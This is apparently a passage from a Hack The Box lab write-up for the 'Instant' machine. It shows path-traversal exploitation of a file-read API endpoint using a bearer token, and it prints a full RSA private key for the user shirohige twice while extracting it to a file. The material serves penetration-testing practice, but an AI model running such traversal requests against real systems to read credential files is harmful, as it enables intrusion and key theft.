LFI
LFI has been identified and confirmed at the log_file_name parameter of the /api/v1/admin/read/log API endpoint
SSH Private Key
┌──(kali㉿kali)-[~/archive/htb/labs/instant]
└─$ curl -s 'http://mywalletv1.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa' \
-H 'Accept: application/json' \
-H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA' | jq
{
"/home/shirohige/logs/../.ssh/id_rsa": [
"-----BEGIN RSA PRIVATE KEY-----\n",
"MIIEpAIBAAKCAQEAy2emewJygN1kSw1d0tzQ6ducZ7AEreXWgQRYhKBPoDscjc1f\n",
"u6uhUEsVJSdZum8UxL1+IkbfXmPyzSqZ85h4kH7uz7VA0xSpI04ywViPRVx9FF8R\n",
"PB55xggXnxsm4tKlew3AOtiWJAsIVdRMvEFqLKzPnLd+JsbDU+YTJtWkKJbmIBry\n",
"2eYJbjSSS1WF/bQ/RRMvCyqHPahNiVG/Z2PM8WT8lHvMuyWj9D9bY5VXdVLWAiul\n",
"2CPcULFBoHdepO5xuPpHAy9QSvanZiYCP8st1DOxEpVZ8Ow2pCekrQsf+81QEZlL\n",
"m2SPHzh18HJOINZtcIchG6pMiADA0lQcV7H45QIDAQABAoIBAACAyAnfrUJR1ITA\n",
"qqB8oNH56Say1Kl3GyMfDGFUQdYoMe93gvrZwhCgMD7IXIxdkswoxCYtYtyJe+ko\n",
"0jrRaqJAL3LZOdORJm5FVtKhF4ZI+Vs39U40LMIXX4g/yYZqlckFNUTqp7Znm5SW\n",
"GD7SnO1cMQ2WwOuzdqS0ueE7n91k1Fmehs7/IgUey7yBf+AQQX75WNN7VCilmehN\n",
"DzHR24M6oSJUgz+/CCwmZyFbgAbcAQD7ThU/CXYEp6ay1cPZxyP6uTfzC65LQOWI\n",
"iPpSRnt6BXNvDqIJStL3Z9nIZTMtpC1c5ImieLM5oADvHxfS7Vn7nYa5hJ3sM3sQ\n",
"dagaZcECgYEA6y5xrepSuWxJxdjMi/eXf76nyIdev+SvxyIQpreNbuYq0WWUwN9T\n",
"7Ntt2jIzlFCImB+Jq9DAJUAVjcyQs0w4bFR7rhov7lmLgJMy5zxHsbuRtFmtvUKq\n",
"AjVQNlx1M+yFa2fXrbcD2B0zX79ENmAFxLSpEuBIVa95TrMofCO3sUECgYEA3Wka\n",
"ccgM5xoH+zjodP0WNG9e8vXMFU4H1rbOEWAgE2kcYCh8C9g3dDXJj0KMuLRWofBc\n",
"Hb+ZWg3spOxFwY9lnYiCfxpVH9wzLPOy/TsvCCLks3splF9nrHTL37yFGiRT1epF\n",
"ZLnZq8Xh+lO64gHNnjb76zXqkoOG8LcnVAckOqUCgYEAztUAy0hKSqKu2t5JPkuY\n",
"pJNjchuDu9X+tW4DIOxK6Z5pR9FDmsCOSb/Ng9kkvap6Bvetlzq20cvjaNrg458D\n",
"/Fnsj/id8Mw1wPU0DmNYVjo08VzxTIKli92hVr3HocvApu4jo7ZSHi3IMcu/zOZ0\n",
"DEQqcdxoIVt6nzk3QL4U3kECgYByei5XGCU7tCTeSr0+B8FcWR0Rp+7eMRsydBA1\n",
"waqz/ovSV/xTL3b0mf7eGH2j3nJQhnNKWk9S1ZI+b39dpePXQMagKyBKOdMn8dTg\n",
"w6H8pfXzqsGD2pRDAZyL0PBM5O2H0/oPK1yVSNofUP12b5I9tJYqNhVTrbeubDRk\n",
"aNDdlQKBgQC4aEeAhAEs2MMgZyY98A1KOK+bRFjVkKSrPxKTEqRtIlasBP9DBSWb\n",
"5pqvaCMd5xCTNyY/xxxPcvZ5+vhbYHqy9NA6dnGQGdXZHd0QHQtxsm2Um+N69Xa6\n",
"pYjqg6FQNXiO7dFxcKnXwDpDx8lGi0FI7B1ImNhTIsjO1Cahbsh0Dg==\n",
"-----END RSA PRIVATE KEY-----\n"
],
"Status": 201
}User’s SSH private key is present
┌──(kali㉿kali)-[~/archive/htb/labs/instant]
└─$ curl -s 'http://mywalletv1.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa' \
-H 'Accept: application/json' \
-H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA' | jq -r '.[].[]' | sed '/^$/d' > id_rsa.shirohige
┌──(kali㉿kali)-[~/archive/htb/labs/instant]
└─$ chmod 600 id_rsa.shirohige
┌──(kali㉿kali)-[~/archive/htb/labs/instant]
└─$ cat id_rsa.shirohige
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAy2emewJygN1kSw1d0tzQ6ducZ7AEreXWgQRYhKBPoDscjc1f
u6uhUEsVJSdZum8UxL1+IkbfXmPyzSqZ85h4kH7uz7VA0xSpI04ywViPRVx9FF8R
PB55xggXnxsm4tKlew3AOtiWJAsIVdRMvEFqLKzPnLd+JsbDU+YTJtWkKJbmIBry
2eYJbjSSS1WF/bQ/RRMvCyqHPahNiVG/Z2PM8WT8lHvMuyWj9D9bY5VXdVLWAiul
2CPcULFBoHdepO5xuPpHAy9QSvanZiYCP8st1DOxEpVZ8Ow2pCekrQsf+81QEZlL
m2SPHzh18HJOINZtcIchG6pMiADA0lQcV7H45QIDAQABAoIBAACAyAnfrUJR1ITA
qqB8oNH56Say1Kl3GyMfDGFUQdYoMe93gvrZwhCgMD7IXIxdkswoxCYtYtyJe+ko
0jrRaqJAL3LZOdORJm5FVtKhF4ZI+Vs39U40LMIXX4g/yYZqlckFNUTqp7Znm5SW
GD7SnO1cMQ2WwOuzdqS0ueE7n91k1Fmehs7/IgUey7yBf+AQQX75WNN7VCilmehN
DzHR24M6oSJUgz+/CCwmZyFbgAbcAQD7ThU/CXYEp6ay1cPZxyP6uTfzC65LQOWI
iPpSRnt6BXNvDqIJStL3Z9nIZTMtpC1c5ImieLM5oADvHxfS7Vn7nYa5hJ3sM3sQ
dagaZcECgYEA6y5xrepSuWxJxdjMi/eXf76nyIdev+SvxyIQpreNbuYq0WWUwN9T
7Ntt2jIzlFCImB+Jq9DAJUAVjcyQs0w4bFR7rhov7lmLgJMy5zxHsbuRtFmtvUKq
AjVQNlx1M+yFa2fXrbcD2B0zX79ENmAFxLSpEuBIVa95TrMofCO3sUECgYEA3Wka
ccgM5xoH+zjodP0WNG9e8vXMFU4H1rbOEWAgE2kcYCh8C9g3dDXJj0KMuLRWofBc
Hb+ZWg3spOxFwY9lnYiCfxpVH9wzLPOy/TsvCCLks3splF9nrHTL37yFGiRT1epF
ZLnZq8Xh+lO64gHNnjb76zXqkoOG8LcnVAckOqUCgYEAztUAy0hKSqKu2t5JPkuY
pJNjchuDu9X+tW4DIOxK6Z5pR9FDmsCOSb/Ng9kkvap6Bvetlzq20cvjaNrg458D
/Fnsj/id8Mw1wPU0DmNYVjo08VzxTIKli92hVr3HocvApu4jo7ZSHi3IMcu/zOZ0
DEQqcdxoIVt6nzk3QL4U3kECgYByei5XGCU7tCTeSr0+B8FcWR0Rp+7eMRsydBA1
waqz/ovSV/xTL3b0mf7eGH2j3nJQhnNKWk9S1ZI+b39dpePXQMagKyBKOdMn8dTg
w6H8pfXzqsGD2pRDAZyL0PBM5O2H0/oPK1yVSNofUP12b5I9tJYqNhVTrbeubDRk
aNDdlQKBgQC4aEeAhAEs2MMgZyY98A1KOK+bRFjVkKSrPxKTEqRtIlasBP9DBSWb
5pqvaCMd5xCTNyY/xxxPcvZ5+vhbYHqy9NA6dnGQGdXZHd0QHQtxsm2Um+N69Xa6
pYjqg6FQNXiO7dFxcKnXwDpDx8lGi0FI7B1ImNhTIsjO1Cahbsh0Dg==
-----END RSA PRIVATE KEY-----Reconstructed the SSH private key Validating